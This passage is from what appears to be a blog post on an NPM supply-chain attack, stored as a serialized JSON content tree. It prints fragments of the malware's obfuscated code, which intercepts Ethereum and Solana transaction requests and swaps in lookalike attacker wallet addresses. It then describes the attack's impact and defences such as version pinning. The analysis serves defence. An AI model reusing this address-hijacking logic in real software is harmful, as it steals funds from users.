{"type":26,"tag":137,"props":100530,"children":100531},{"style":5601},[100532],{"type":32,"value":32762},{"type":26,"tag":137,"props":100534,"children":100535},{"style":5682},[100536],{"type":32,"value":32},{"type":26,"tag":137,"props":100538,"children":100539},{"style":5601},[100540],{"type":32,"value":6267},{"type":26,"tag":137,"props":100542,"children":100543},{"class":5559,"line":5909},[100544],{"type":26,"tag":137,"props":100545,"children":100546},{"style":5601},[100547],{"type":32,"value":8457},{"type":26,"tag":137,"props":100549,"children":100550},{"class":5559,"line":5930},[100551,100555,100560,100564,100569,100573,100577],{"type":26,"tag":137,"props":100552,"children":100553},{"style":5573},[100554],{"type":32,"value":38784},{"type":26,"tag":137,"props":100556,"children":100557},{"style":5584},[100558],{"type":32,"value":100559}," processedData",{"type":26,"tag":137,"props":100561,"children":100562},{"style":5590},[100563],{"type":32,"value":5593},{"type":26,"tag":137,"props":100565,"children":100566},{"style":5682},[100567],{"type":32,"value":100568}," replaceAddresses",{"type":26,"tag":137,"props":100570,"children":100571},{"style":5601},[100572],{"type":32,"value":165},{"type":26,"tag":137,"props":100574,"children":100575},{"style":5584},[100576],{"type":32,"value":6303},{"type":26,"tag":137,"props":100578,"children":100579},{"style":5601},[100580],{"type":32,"value":6430},{"type":26,"tag":137,"props":100582,"children":100583},{"class":5559,"line":5939},[100584,100588,100593],{"type":26,"tag":137,"props":100585,"children":100586},{"style":5573},[100587],{"type":32,"value":38784},{"type":26,"tag":137,"props":100589,"children":100590},{"style":5584},[100591],{"type":32,"value":100592}," finalResponseText",{"type":26,"tag":137,"props":100594,"children":100595},{"style":5590},[100596],{"type":32,"value":38451},{"type":26,"tag":137,"props":100598,"children":100599},{"class":5559,"line":6191},[100600,100605,100609,100613,100618,100623,100627,100631,100635,100639,100643,100647,100652],{"type":26,"tag":137,"props":100601,"children":100602},{"style":5573},[100603],{"type":32,"value":100604},"    typeof",{"type":26,"tag":137,"props":100606,"children":100607},{"style":5584},[100608],{"type":32,"value":100559},{"type":26,"tag":137,"props":100610,"children":100611},{"style":5590},[100612],{"type":32,"value":34017},{"type":26,"tag":137,"props":100614,"children":100615},{"style":6837},[100616],{"type":32,"value":100617}," 'string'",{"type":26,"tag":137,"props":100619,"children":100620},{"style":5590},[100621],{"type":32,"value":100622}," ?",{"type":26,"tag":137,"props":100624,"children":100625},{"style":5584},[100626],{"type":32,"value":100559},{"type":26,"tag":137,"props":100628,"children":100629},{"style":5590},[100630],{"type":32,"value":37712},{"type":26,"tag":137,"props":100632,"children":100633},{"style":5584},[100634],{"type":32,"value":40124},{"type":26,"tag":137,"props":100636,"children":100637},{"style":5601},[100638],{"type":32,"value":470},{"type":26,"tag":137,"props":100640,"children":100641},{"style":5682},[100642],{"type":32,"value":41829},{"type":26,"tag":137,"props":100644,"children":100645},{"style":5601},[100646],{"type":32,"value":165},{"type":26,"tag":137,"props":100648,"children":100649},{"style":5584},[100650],{"type":32,"value":100651},"processedData",{"type":26,"tag":137,"props":100653,"children":100654},{"style":5601},[100655],{"type":32,"value":6430},{"type":26,"tag":137,"props":100657,"children":100658},{"class":5559,"line":6208},[100659,100663,100668,100672,100676,100681,100685,100690],{"type":26,"tag":137,"props":100660,"children":100661},{"style":5573},[100662],{"type":32,"value":38784},{"type":26,"tag":137,"props":100664,"children":100665},{"style":5584},[100666],{"type":32,"value":100667}," finalResponse",{"type":26,"tag":137,"props":100669,"children":100670},{"style":5590},[100671],{"type":32,"value":5593},{"type":26,"tag":137,"props":100673,"children":100674},{"style":5573},[100675],{"type":32,"value":34528},{"type":26,"tag":137,"props":100677,"children":100678},{"style":5682},[100679],{"type":32,"value":100680}," Response",{"type":26,"tag":137,"props":100682,"children":100683},{"style":5601},[100684],{"type":32,"value":165},{"type":26,"tag":137,"props":100686,"children":100687},{"style":5584},[100688],{"type":32,"value":100689},"finalResponseText",{"type":26,"tag":137,"props":100691,"children":100692},{"style":5601},[100693],{"type":32,"value":51484},{"type":26,"tag":137,"props":100695,"children":100696},{"class":5559,"line":6225},[100697,100702,100706,100710,100715],{"type":26,"tag":137,"props":100698,"children":100699},{"style":5584},[100700],{"type":32,"value":100701},"    status:",{"type":26,"tag":137,"props":100703,"children":100704},{"style":5584},[100705],{"type":32,"value":100288},{"type":26,"tag":137,"props":100707,"children":100708},{"style":5601},[100709],{"type":32,"value":470},{"type":26,"tag":137,"props":100711,"children":100712},{"style":5584},[100713],{"type":32,"value":100714},"status",{"type":26,"tag":137,"props":100716,"children":100717},{"style":5601},[100718],{"type":32,"value":6099},{"type":26,"tag":137,"props":100720,"children":100721},{"class":5559,"line":6238},[100722,100727,100731,100735,100740],{"type":26,"tag":137,"props":100723,"children":100724},{"style":5584},[100725],{"type":32,"value":100726},"    statusText:",{"type":26,"tag":137,"props":100728,"children":100729},{"style":5584},[100730],{"type":32,"value":100288},{"type":26,"tag":137,"props":100732,"children":100733},{"style":5601},[100734],{"type":32,"value":470},{"type":26,"tag":137,"props":100736,"children":100737},{"style":5584},[100738],{"type":32,"value":100739},"statusText",{"type":26,"tag":137,"props":100741,"children":100742},{"style":5601},[100743],{"type":32,"value":6099},{"type":26,"tag":137,"props":100745,"children":100746},{"class":5559,"line":6247},[100747,100752,100756,100760,100764],{"type":26,"tag":137,"props":100748,"children":100749},{"style":5584},[100750],{"type":32,"value":100751},"    headers:",{"type":26,"tag":137,"props":100753,"children":100754},{"style":5584},[100755],{"type":32,"value":100288},{"type":26,"tag":137,"props":100757,"children":100758},{"style":5601},[100759],{"type":32,"value":470},{"type":26,"tag":137,"props":100761,"children":100762},{"style":5584},[100763],{"type":32,"value":100362},{"type":26,"tag":137,"props":100765,"children":100766},{"style":5601},[100767],{"type":32,"value":6099},{"type":26,"tag":137,"props":100769,"children":100770},{"class":5559,"line":6270},[100771],{"type":26,"tag":137,"props":100772,"children":100773},{"style":5601},[100774],{"type":32,"value":100775},"  });\n",{"type":26,"tag":137,"props":100777,"children":100778},{"class":5559,"line":6279},[100779,100783,100787],{"type":26,"tag":137,"props":100780,"children":100781},{"style":5610},[100782],{"type":32,"value":41795},{"type":26,"tag":137,"props":100784,"children":100785},{"style":5584},[100786],{"type":32,"value":100667},{"type":26,"tag":137,"props":100788,"children":100789},{"style":5601},[100790],{"type":32,"value":5604},{"type":26,"tag":137,"props":100792,"children":100793},{"class":5559,"line":6288},[100794],{"type":26,"tag":137,"props":100795,"children":100796},{"style":5601},[100797],{"type":32,"value":19170},{"type":26,"tag":4820,"props":100799,"children":100800},{"start":5417},[100801],{"type":26,"tag":3430,"props":100802,"children":100803},{},[100804],{"type":32,"value":100805},"The malware intercepted wallet requests and silently replaced the receiver address with the attacker address. Instead of a blunt substitution, it used the Levenshtein distance algorithm to pick a lookalike address, which made it harder for victims to notice funds being siphoned.",{"type":26,"tag":5512,"props":100807,"children":100809},{"code":100808,"language":33960,"meta":7,"className":33958,"style":7},"if (_0x2c3d7e.method === 'eth_sendTransaction' && _0x2c3d7e.params && _0x2c3d7e.params[0]) {\n  try {\n    const _0x39ad21 = _0x1089ae(_0x2c3d7e.params[0], true);\n    _0x2c3d7e.params[0] = _0x39ad21;\n  } catch (_0x226343) {}\n} else {\n  if (\n    (_0x2c3d7e.method === 'solana_signTransaction' ||\n      _0x2c3d7e.method === 'solana_signAndSendTransaction') &&\n    _0x2c3d7e.params &&\n    _0x2c3d7e.params[0]\n  ) {\n    try {\n      let _0x5ad975 = _0x2c3d7e.params[0];\n      if (_0x5ad975.transaction) {\n        _0x5ad975 = _0x5ad975.transaction;\n      }\n      const _0x5dbe63 = _0x1089ae(_0x5ad975, false);\n      if (_0x2c3d7e.params[0].transaction) {\n        _0x2c3d7e.params[0].transaction = _0x5dbe63;\n      } else {\n        _0x2c3d7e.params[0] = _0x5dbe63;\n      }\n    } catch (_0x4b99fd) {}\n  }\n}\n",[100810],{"type":26,"tag":130,"props":100811,"children":100812},{"__ignoreMap":7},[100813,100892,100903,100960,101000,101025,101040,101051,101085,101118,101137,101164,101172,101183,101223,101252,101280,101287,101327,101370,101414,101429,101468,101475,101499,101506],{"type":26,"tag":137,"props":100814,"children":100815},{"class":5559,"line":5560},[100816,100820,100824,100829,100833,100837,100841,100846,100850,100855,100859,100864,100868,100872,100876,100880,100884,100888],{"type":26,"tag":137,"props":100817,"children":100818},{"style":5610},[100819],{"type":32,"value":18171},{"type":26,"tag":137,"props":100821,"children":100822},{"style":5601},[100823],{"type":32,"value":4625},{"type":26,"tag":137,"props":100825,"children":100826},{"style":5584},[100827],{"type":32,"value":100828},"_0x2c3d7e",{"type":26,"tag":137,"props":100830,"children":100831},{"style":5601},[100832],{"type":32,"value":470},{"type":26,"tag":137,"props":100834,"children":100835},{"style":5584},[100836],{"type":32,"value":40909},{"type":26,"tag":137,"props":100838,"children":100839},{"style":5590},[100840],{"type":32,"value":34017},{"type":26,"tag":137,"props":100842,"children":100843},{"style":6837},[100844],{"type":32,"value":100845}," 'eth_sendTransaction'",{"type":26,"tag":137,"props":100847,"children":100848},{"style":5590},[100849],{"type":32,"value":16776},{"type":26,"tag":137,"props":100851,"children":100852},{"style":5584},[100853],{"type":32,"value":100854}," _0x2c3d7e",{"type":26,"tag":137,"props":100856,"children":100857},{"style":5601},[100858],{"type":32,"value":470},{"type":26,"tag":137,"props":100860,"children":100861},{"style":5584},[100862],{"type":32,"value":100863},"params",{"type":26,"tag":137,"props":100865,"children":100866},{"style":5590},[100867],{"type":32,"value":16776},{"type":26,"tag":137,"props":100869,"children":100870},{"style":5584},[100871],{"type":32,"value":100854},{"type":26,"tag":137,"props":100873,"children":100874},{"style":5601},[100875],{"type":32,"value":470},{"type":26,"tag":137,"props":100877,"children":100878},{"style":5584},[100879],{"type":32,"value":100863},{"type":26,"tag":137,"props":100881,"children":100882},{"style":5601},[100883],{"type":32,"value":3016},{"type":26,"tag":137,"props":100885,"children":100886},{"style":5626},[100887],{"type":32,"value":1817},{"type":26,"tag":137,"props":100889,"children":100890},{"style":5601},[100891],{"type":32,"value":43221},{"type":26,"tag":137,"props":100893,"children":100894},{"class":5559,"line":5412},[100895,100899],{"type":26,"tag":137,"props":100896,"children":100897},{"style":5610},[100898],{"type":32,"value":99931},{"type":26,"tag":137,"props":100900,"children":100901},{"style":5601},[100902],{"type":32,"value":5875},{"type":26,"tag":137,"props":100904,"children":100905},{"class":5559,"line":5417},[100906,100910,100915,100919,100924,100928,100932,100936,100940,100944,100948,100952,100956],{"type":26,"tag":137,"props":100907,"children":100908},{"style":5573},[100909],{"type":32,"value":54271},{"type":26,"tag":137,"props":100911,"children":100912},{"style":5584},[100913],{"type":32,"value":100914}," _0x39ad21",{"type":26,"tag":137,"props":100916,"children":100917},{"style":5590},[100918],{"type":32,"value":5593},{"type":26,"tag":137,"props":100920,"children":100921},{"style":5682},[100922],{"type":32,"value":100923}," _0x1089ae",{"type":26,"tag":137,"props":100925,"children":100926},{"style":5601},[100927],{"type":32,"value":165},{"type":26,"tag":137,"props":100929,"children":100930},{"style":5584},[100931],{"type":32,"value":100828},{"type":26,"tag":137,"props":100933,"children":100934},{"style":5601},[100935],{"type":32,"value":470},{"type":26,"tag":137,"props":100937,"children":100938},{"style":5584},[100939],{"type":32,"value":100863},{"type":26,"tag":137,"props":100941,"children":100942},{"style":5601},[100943],{"type":32,"value":3016},{"type":26,"tag":137,"props":100945,"children":100946},{"style":5626},[100947],{"type":32,"value":1817},{"type":26,"tag":137,"props":100949,"children":100950},{"style":5601},[100951],{"type":32,"value":25640},{"type":26,"tag":137,"props":100953,"children":100954},{"style":5573},[100955],{"type":32,"value":146},{"type":26,"tag":137,"props":100957,"children":100958},{"style":5601},[100959],{"type":32,"value":6430},{"type":26,"tag":137,"props":100961,"children":100962},{"class":5559,"line":5642},[100963,100968,100972,100976,100980,100984,100988,100992,100996],{"type":26,"tag":137,"props":100964,"children":100965},{"style":5584},[100966],{"type":32,"value":100967},"    _0x2c3d7e",{"type":26,"tag":137,"props":100969,"children":100970},{"style":5601},[100971],{"type":32,"value":470},{"type":26,"tag":137,"props":100973,"children":100974},{"style":5584},[100975],{"type":32,"value":100863},{"type":26,"tag":137,"props":100977,"children":100978},{"style":5601},[100979],{"type":32,"value":3016},{"type":26,"tag":137,"props":100981,"children":100982},{"style":5626},[100983],{"type":32,"value":1817},{"type":26,"tag":137,"props":100985,"children":100986},{"style":5601},[100987],{"type":32,"value":11247},{"type":26,"tag":137,"props":100989,"children":100990},{"style":5590},[100991],{"type":32,"value":289},{"type":26,"tag":137,"props":100993,"children":100994},{"style":5584},[100995],{"type":32,"value":100914},{"type":26,"tag":137,"props":100997,"children":100998},{"style":5601},[100999],{"type":32,"value":5604},{"type":26,"tag":137,"props":101001,"children":101002},{"class":5559,"line":5745},[101003,101007,101011,101015,101020],{"type":26,"tag":137,"props":101004,"children":101005},{"style":5601},[101006],{"type":32,"value":34063},{"type":26,"tag":137,"props":101008,"children":101009},{"style":5610},[101010],{"type":32,"value":51013},{"type":26,"tag":137,"props":101012,"children":101013},{"style":5601},[101014],{"type":32,"value":4625},{"type":26,"tag":137,"props":101016,"children":101017},{"style":5584},[101018],{"type":32,"value":101019},"_0x226343",{"type":26,"tag":137,"props":101021,"children":101022},{"style":5601},[101023],{"type":32,"value":101024},") {}\n",{"type":26,"tag":137,"props":101026,"children":101027},{"class":5559,"line":5850},[101028,101032,101036],{"type":26,"tag":137,"props":101029,"children":101030},{"style":5601},[101031],{"type":32,"value":49476},{"type":26,"tag":137,"props":101033,"children":101034},{"style":5610},[101035],{"type":32,"value":5902},{"type":26,"tag":137,"props":101037,"children":101038},{"style":5601},[101039],{"type":32,"value":5875},{"type":26,"tag":137,"props":101041,"children":101042},{"class":5559,"line":5878},[101043,101047],{"type":26,"tag":137,"props":101044,"children":101045},{"style":5610},[101046],{"type":32,"value":33989},{"type":26,"tag":137,"props":101048,"children":101049},{"style":5601},[101050],{"type":32,"value":81168},{"type":26,"tag":137,"props":101052,"children":101053},{"class":5559,"line":5891},[101054,101059,101063,101067,101071,101075,101080],{"type":26,"tag":137,"props":101055,"children":101056},{"style":5601},[101057],{"type":32,"value":101058},"    (",{"type":26,"tag":137,"props":101060,"children":101061},{"style":5584},[101062],{"type":32,"value":100828},{"type":26,"tag":137,"props":101064,"children":101065},{"style":5601},[101066],{"type":32,"value":470},{"type":26,"tag":137,"props":101068,"children":101069},{"style":5584},[101070],{"type":32,"value":40909},{"type":26,"tag":137,"props":101072,"children":101073},{"style":5590},[101074],{"type":32,"value":34017},{"type":26,"tag":137,"props":101076,"children":101077},{"style":6837},[101078],{"type":32,"value":101079}," 'solana_signTransaction'",{"type":26,"tag":137,"props":101081,"children":101082},{"style":5590},[101083],{"type":32,"value":101084}," ||\n",{"type":26,"tag":137,"props":101086,"children":101087},{"class":5559,"line":5909},[101088,101093,101097,101101,101105,101110,101114],{"type":26,"tag":137,"props":101089,"children":101090},{"style":5584},[101091],{"type":32,"value":101092},"      _0x2c3d7e",{"type":26,"tag":137,"props":101094,"children":101095},{"style":5601},[101096],{"type":32,"value":470},{"type":26,"tag":137,"props":101098,"children":101099},{"style":5584},[101100],{"type":32,"value":40909},{"type":26,"tag":137,"props":101102,"children":101103},{"style":5590},[101104],{"type":32,"value":34017},{"type":26,"tag":137,"props":101106,"children":101107},{"style":6837},[101108],{"type":32,"value":101109}," 'solana_signAndSendTransaction'",{"type":26,"tag":137,"props":101111,"children":101112},{"style":5601},[101113],{"type":32,"value":5671},{"type":26,"tag":137,"props":101115,"children":101116},{"style":5590},[101117],{"type":32,"value":86417},{"type":26,"tag":137,"props":101119,"children":101120},{"class":5559,"line":5930},[101121,101125,101129,101133],{"type":26,"tag":137,"props":101122,"children":101123},{"style":5584},[101124],{"type":32,"value":100967},{"type":26,"tag":137,"props":101126,"children":101127},{"style":5601},[101128],{"type":32,"value":470},{"type":26,"tag":137,"props":101130,"children":101131},{"style":5584},[101132],{"type":32,"value":100863},{"type":26,"tag":137,"props":101134,"children":101135},{"style":5590},[101136],{"type":32,"value":55287},{"type":26,"tag":137,"props":101138,"children":101139},{"class":5559,"line":5939},[101140,101144,101148,101152,101156,101160],{"type":26,"tag":137,"props":101141,"children":101142},{"style":5584},[101143],{"type":32,"value":100967},{"type":26,"tag":137,"props":101145,"children":101146},{"style":5601},[101147],{"type":32,"value":470},{"type":26,"tag":137,"props":101149,"children":101150},{"style":5584},[101151],{"type":32,"value":100863},{"type":26,"tag":137,"props":101153,"children":101154},{"style":5601},[101155],{"type":32,"value":3016},{"type":26,"tag":137,"props":101157,"children":101158},{"style":5626},[101159],{"type":32,"value":1817},{"type":26,"tag":137,"props":101161,"children":101162},{"style":5601},[101163],{"type":32,"value":14363},{"type":26,"tag":137,"props":101165,"children":101166},{"class":5559,"line":6191},[101167],{"type":26,"tag":137,"props":101168,"children":101169},{"style":5601},[101170],{"type":32,"value":101171},"  ) {\n",{"type":26,"tag":137,"props":101173,"children":101174},{"class":5559,"line":6208},[101175,101179],{"type":26,"tag":137,"props":101176,"children":101177},{"style":5610},[101178],{"type":32,"value":72584},{"type":26,"tag":137,"props":101180,"children":101181},{"style":5601},[101182],{"type":32,"value":5875},{"type":26,"tag":137,"props":101184,"children":101185},{"class":5559,"line":6225},[101186,101190,101195,101199,101203,101207,101211,101215,101219],{"type":26,"tag":137,"props":101187,"children":101188},{"style":5573},[101189],{"type":32,"value":10660},{"type":26,"tag":137,"props":101191,"children":101192},{"style":5584},[101193],{"type":32,"value":101194}," _0x5ad975",{"type":26,"tag":137,"props":101196,"children":101197},{"style":5590},[101198],{"type":32,"value":5593},{"type":26,"tag":137,"props":101200,"children":101201},{"style":5584},[101202],{"type":32,"value":100854},{"type":26,"tag":137,"props":101204,"children":101205},{"style":5601},[101206],{"type":32,"value":470},{"type":26,"tag":137,"props":101208,"children":101209},{"style":5584},[101210],{"type":32,"value":100863},{"type":26,"tag":137,"props":101212,"children":101213},{"style":5601},[101214],{"type":32,"value":3016},{"type":26,"tag":137,"props":101216,"children":101217},{"style":5626},[101218],{"type":32,"value":1817},{"type":26,"tag":137,"props":101220,"children":101221},{"style":5601},[101222],{"type":32,"value":34169},{"type":26,"tag":137,"props":101224,"children":101225},{"class":5559,"line":6238},[101226,101230,101234,101239,101243,101248],{"type":26,"tag":137,"props":101227,"children":101228},{"style":5610},[101229],{"type":32,"value":41883},{"type":26,"tag":137,"props":101231,"children":101232},{"style":5601},[101233],{"type":32,"value":4625},{"type":26,"tag":137,"props":101235,"children":101236},{"style":5584},[101237],{"type":32,"value":101238},"_0x5ad975",{"type":26,"tag":137,"props":101240,"children":101241},{"style":5601},[101242],{"type":32,"value":470},{"type":26,"tag":137,"props":101244,"children":101245},{"style":5584},[101246],{"type":32,"value":101247},"transaction",{"type":26,"tag":137,"props":101249,"children":101250},{"style":5601},[101251],{"type":32,"value":17395},{"type":26,"tag":137,"props":101253,"children":101254},{"class":5559,"line":6247},[101255,101260,101264,101268,101272,101276],{"type":26,"tag":137,"props":101256,"children":101257},{"style":5584},[101258],{"type":32,"value":101259},"        _0x5ad975",{"type":26,"tag":137,"props":101261,"children":101262},{"style":5590},[101263],{"type":32,"value":5593},{"type":26,"tag":137,"props":101265,"children":101266},{"style":5584},[101267],{"type":32,"value":101194},{"type":26,"tag":137,"props":101269,"children":101270},{"style":5601},[101271],{"type":32,"value":470},{"type":26,"tag":137,"props":101273,"children":101274},{"style":5584},[101275],{"type":32,"value":101247},{"type":26,"tag":137,"props":101277,"children":101278},{"style":5601},[101279],{"type":32,"value":5604},{"type":26,"tag":137,"props":101281,"children":101282},{"class":5559,"line":6270},[101283],{"type":26,"tag":137,"props":101284,"children":101285},{"style":5601},[101286],{"type":32,"value":15255},{"type":26,"tag":137,"props":101288,"children":101289},{"class":5559,"line":6279},[101290,101294,101299,101303,101307,101311,101315,101319,101323],{"type":26,"tag":137,"props":101291,"children":101292},{"style":5573},[101293],{"type":32,"value":34142},{"type":26,"tag":137,"props":101295,"children":101296},{"style":5584},[101297],{"type":32,"value":101298}," _0x5dbe63",{"type":26,"tag":137,"props":101300,"children":101301},{"style":5590},[101302],{"type":32,"value":5593},{"type":26,"tag":137,"props":101304,"children":101305},{"style":5682},[101306],{"type":32,"value":100923},{"type":26,"tag":137,"props":101308,"children":101309},{"style":5601},[101310],{"type":32,"value":165},{"type":26,"tag":137,"props":101312,"children":101313},{"style":5584},[101314],{"type":32,"value":101238},{"type":26,"tag":137,"props":101316,"children":101317},{"style":5601},[101318],{"type":32,"value":1108},{"type":26,"tag":137,"props":101320,"children":101321},{"style":5573},[101322],{"type":32,"value":10760},{"type":26,"tag":137,"props":101324,"children":101325},{"style":5601},[101326],{"type":32,"value":6430},{"type":26,"tag":137,"props":101328,"children":101329},{"class":5559,"line":6288},[101330,101334,101338,101342,101346,101350,101354,101358,101362,101366],{"type":26,"tag":137,"props":101331,"children":101332},{"style":5610},[101333],{"type":32,"value":41883},{"type":26,"tag":137,"props":101335,"children":101336},{"style":5601},[101337],{"type":32,"value":4625},{"type":26,"tag":137,"props":101339,"children":101340},{"style":5584},[101341],{"type":32,"value":100828},{"type":26,"tag":137,"props":101343,"children":101344},{"style":5601},[101345],{"type":32,"value":470},{"type":26,"tag":137,"props":101347,"children":101348},{"style":5584},[101349],{"type":32,"value":100863},{"type":26,"tag":137,"props":101351,"children":101352},{"style":5601},[101353],{"type":32,"value":3016},{"type":26,"tag":137,"props":101355,"children":101356},{"style":5626},[101357],{"type":32,"value":1817},{"type":26,"tag":137,"props":101359,"children":101360},{"style":5601},[101361],{"type":32,"value":52951},{"type":26,"tag":137,"props":101363,"children":101364},{"style":5584},[101365],{"type":32,"value":101247},{"type":26,"tag":137,"props":101367,"children":101368},{"style":5601},[101369],{"type":32,"value":17395},{"type":26,"tag":137,"props":101371,"children":101372},{"class":5559,"line":6355},[101373,101378,101382,101386,101390,101394,101398,101402,101406,101410],{"type":26,"tag":137,"props":101374,"children":101375},{"style":5584},[101376],{"type":32,"value":101377},"        _0x2c3d7e",{"type":26,"tag":137,"props":101379,"children":101380},{"style":5601},[101381],{"type":32,"value":470},{"type":26,"tag":137,"props":101383,"children":101384},{"style":5584},[101385],{"type":32,"value":100863},{"type":26,"tag":137,"props":101387,"children":101388},{"style":5601},[101389],{"type":32,"value":3016},{"type":26,"tag":137,"props":101391,"children":101392},{"style":5626},[101393],{"type":32,"value":1817},{"type":26,"tag":137,"props":101395,"children":101396},{"style":5601},[101397],{"type":32,"value":52951},{"type":26,"tag":137,"props":101399,"children":101400},{"style":5584},[101401],{"type":32,"value":101247},{"type":26,"tag":137,"props":101403,"children":101404},{"style":5590},[101405],{"type":32,"value":5593},{"type":26,"tag":137,"props":101407,"children":101408},{"style":5584},[101409],{"type":32,"value":101298},{"type":26,"tag":137,"props":101411,"children":101412},{"style":5601},[101413],{"type":32,"value":5604},{"type":26,"tag":137,"props":101415,"children":101416},{"class":5559,"line":6363},[101417,101421,101425],{"type":26,"tag":137,"props":101418,"children":101419},{"style":5601},[101420],{"type":32,"value":41536},{"type":26,"tag":137,"props":101422,"children":101423},{"style":5610},[101424],{"type":32,"value":5902},{"type":26,"tag":137,"props":101426,"children":101427},{"style":5601},[101428],{"type":32,"value":5875},{"type":26,"tag":137,"props":101430,"children":101431},{"class":5559,"line":6393},[101432,101436,101440,101444,101448,101452,101456,101460,101464],{"type":26,"tag":137,"props":101433,"children":101434},{"style":5584},[101435],{"type":32,"value":101377},{"type":26,"tag":137,"props":101437,"children":101438},{"style":5601},[101439],{"type":32,"value":470},{"type":26,"tag":137,"props":101441,"children":101442},{"style":5584},[101443],{"type":32,"value":100863},{"type":26,"tag":137,"props":101445,"children":101446},{"style":5601},[101447],{"type":32,"value":3016},{"type":26,"tag":137,"props":101449,"children":101450},{"style":5626},[101451],{"type":32,"value":1817},{"type":26,"tag":137,"props":101453,"children":101454},{"style":5601},[101455],{"type":32,"value":11247},{"type":26,"tag":137,"props":101457,"children":101458},{"style":5590},[101459],{"type":32,"value":289},{"type":26,"tag":137,"props":101461,"children":101462},{"style":5584},[101463],{"type":32,"value":101298},{"type":26,"tag":137,"props":101465,"children":101466},{"style":5601},[101467],{"type":32,"value":5604},{"type":26,"tag":137,"props":101469,"children":101470},{"class":5559,"line":6401},[101471],{"type":26,"tag":137,"props":101472,"children":101473},{"style":5601},[101474],{"type":32,"value":15255},{"type":26,"tag":137,"props":101476,"children":101477},{"class":5559,"line":6433},[101478,101482,101486,101490,101495],{"type":26,"tag":137,"props":101479,"children":101480},{"style":5601},[101481],{"type":32,"value":18371},{"type":26,"tag":137,"props":101483,"children":101484},{"style":5610},[101485],{"type":32,"value":51013},{"type":26,"tag":137,"props":101487,"children":101488},{"style":5601},[101489],{"type":32,"value":4625},{"type":26,"tag":137,"props":101491,"children":101492},{"style":5584},[101493],{"type":32,"value":101494},"_0x4b99fd",{"type":26,"tag":137,"props":101496,"children":101497},{"style":5601},[101498],{"type":32,"value":101024},{"type":26,"tag":137,"props":101500,"children":101501},{"class":5559,"line":6441},[101502],{"type":26,"tag":137,"props":101503,"children":101504},{"style":5601},[101505],{"type":32,"value":8457},{"type":26,"tag":137,"props":101507,"children":101508},{"class":5559,"line":6501},[101509],{"type":26,"tag":137,"props":101510,"children":101511},{"style":5601},[101512],{"type":32,"value":6507},{"type":26,"tag":118,"props":101514,"children":101516},{"id":101515},"impact-of-the-attack",[101517],{"type":32,"value":101518},"Impact of the Attack",{"type":26,"tag":35,"props":101520,"children":101521},{},[101522],{"type":32,"value":101523},"Despite the attack targeting popular NPM packages, the exploit was not very successful. After two days, the attacker's wallet was only able to drain about $1000. However, the takeaway is how easily a trusted dependency can become a delivery vector for malware.",{"type":26,"tag":92,"props":101525,"children":101527},{"id":101526},"why-it-will-happen-again",[101528],{"type":32,"value":101529},"Why It Will Happen Again",{"type":26,"tag":35,"props":101531,"children":101532},{},[101533],{"type":32,"value":101534},"The decentralized nature of the open-source ecosystem, and particularly a massive registry like NPM, makes it an attractive and persistent target for attackers. Although this recent attack was quickly mitigated and financially minor, it served as a powerful and widely-publicized proof-of-concept showing how one compromised maintainer can distribute malware at scale.",{"type":26,"tag":35,"props":101536,"children":101537},{},[101538],{"type":32,"value":101539},"With over two million packages and countless layers of direct and transitive dependencies, a compromise can cascade through thousands of projects in hours. It's the classic \"needle in a haystack\" problem, except the haystack keeps growing.",{"type":26,"tag":92,"props":101541,"children":101543},{"id":101542},"what-developers-can-do",[101544],{"type":32,"value":101545},"What Developers Can Do",{"type":26,"tag":35,"props":101547,"children":101548},{},[101549],{"type":32,"value":101550},"If you are building critical systems where supply-chain attacks are an unacceptable risk in your threat model, here are some practical actions you can take:",{"type":26,"tag":118,"props":101552,"children":101554},{"id":101553},"_1-version-pinning-in-packagejson",[101555,101557],{"type":32,"value":101556},"1. Version pinning in ",{"type":26,"tag":130,"props":101558,"children":101560},{"className":101559},[],[101561],{"type":32,"value":101562},"package.json",{"type":26,"tag":35,"props":101564,"children":101565},{},[101566],{"type":32,"value":101567},"Applications get compromised by supply-chain attacks when an attacker releases a new version of an NPM package and the application automatically downloads it to have the latest package version.",{"type":26,"tag":35,"props":101569,"children":101570},{},[101571,101573,101579,101581,101586,101588,101593],{"type":32,"value":101572},"You can pin your dependency versions to make sure they won't get updated when running ",{"type":26,"tag":130,"props":101574,"children":101576},{"className":101575},[],[101577],{"type":32,"value":101578},"npm install",{"type":32,"value":101580},". To pin it, just make sure to remove the caret ",{"type":26,"tag":130,"props":101582,"children":101584},{"className":101583},[],[101585],{"type":32,"value":51536},{"type":32,"value":101587}," symbol before the version in ",{"type":26,"tag":130,"props":101589,"children":101591},{"className":101590},[],[101592],{"type":32,"value":101562},{"type":32,"value":7072},{"type":26,"tag":5512,"props":101595,"children":101597},{"code":101596,"language":36593,"meta":7,"className":36591,"style":7},"\"@react-native-async-storage/async-storage\": \"1.23.1\",\n\"@react-native-community/datetimepicker\": \"8.3.0\",\n\"@react-native-community/netinfo\": \"11.4.1\",\n\"@react-native-picker/picker\": \"2.11.0\"\n",[101598],{"type":26,"tag":130,"props":101599,"children":101600},{"__ignoreMap":7},[101601,101622,101643,101664],{"type":26,"tag":137,"props":101602,"children":101603},{"class":5559,"line":5560},[101604,101609,101613,101618],{"type":26,"tag":137,"props":101605,"children":101606},{"style":6837},[101607],{"type":32,"value":101608},"\"@react-native-async-storage/async-storage\"",{"type":26,"tag":137,"props":101610,"children":101611},{"style":5601},[101612],{"type":32,"value":17923},{"type":26,"tag":137,"props":101614,"children":101615},{"style":6837},[101616],{"type":32,"value":101617},"\"1.23.1\"",{"type":26,"tag":137,"props":101619,"children":101620},{"style":5601},[101621],{"type":32,"value":6099},{"type":26,"tag":137,"props":101623,"children":101624},{"class":5559,"line":5412},[101625,101630,101634,101639],{"type":26,"tag":137,"props":101626,"children":101627},{"style":6837},[101628],{"type":32,"value":101629},"\"@react-native-community/datetimepicker\"",{"type":26,"tag":137,"props":101631,"children":101632},{"style":5601},[101633],{"type":32,"value":17923},{"type":26,"tag":137,"props":101635,"children":101636},{"style":6837},[101637],{"type":32,"value":101638},"\"8.3.0\"",{"type":26,"tag":137,"props":101640,"children":101641},{"style":5601},[101642],{"type":32,"value":6099},{"type":26,"tag":137,"props":101644,"children":101645},{"class":5559,"line":5417},[101646,101651,101655,101660],{"type":26,"tag":137,"props":101647,"children":101648},{"style":6837},[101649],{"type":32,"value":101650},"\"@react-native-community/netinfo\"",{"type":26,"tag":137,"props":101652,"children":101653},{"style":5601},[101654],{"type":32,"value":17923},{"type":26,"tag":137,"props":101656,"children":101657},{"style":6837},[101658],{"type":32,"value":101659},"\"11.4.1\"",{"type":26,"tag":137,"props":101661,"children":101662},{"style":5601},[101663],{"type":32,"value":6099},{"type":26,"tag":137,"props":101665,"children":101666},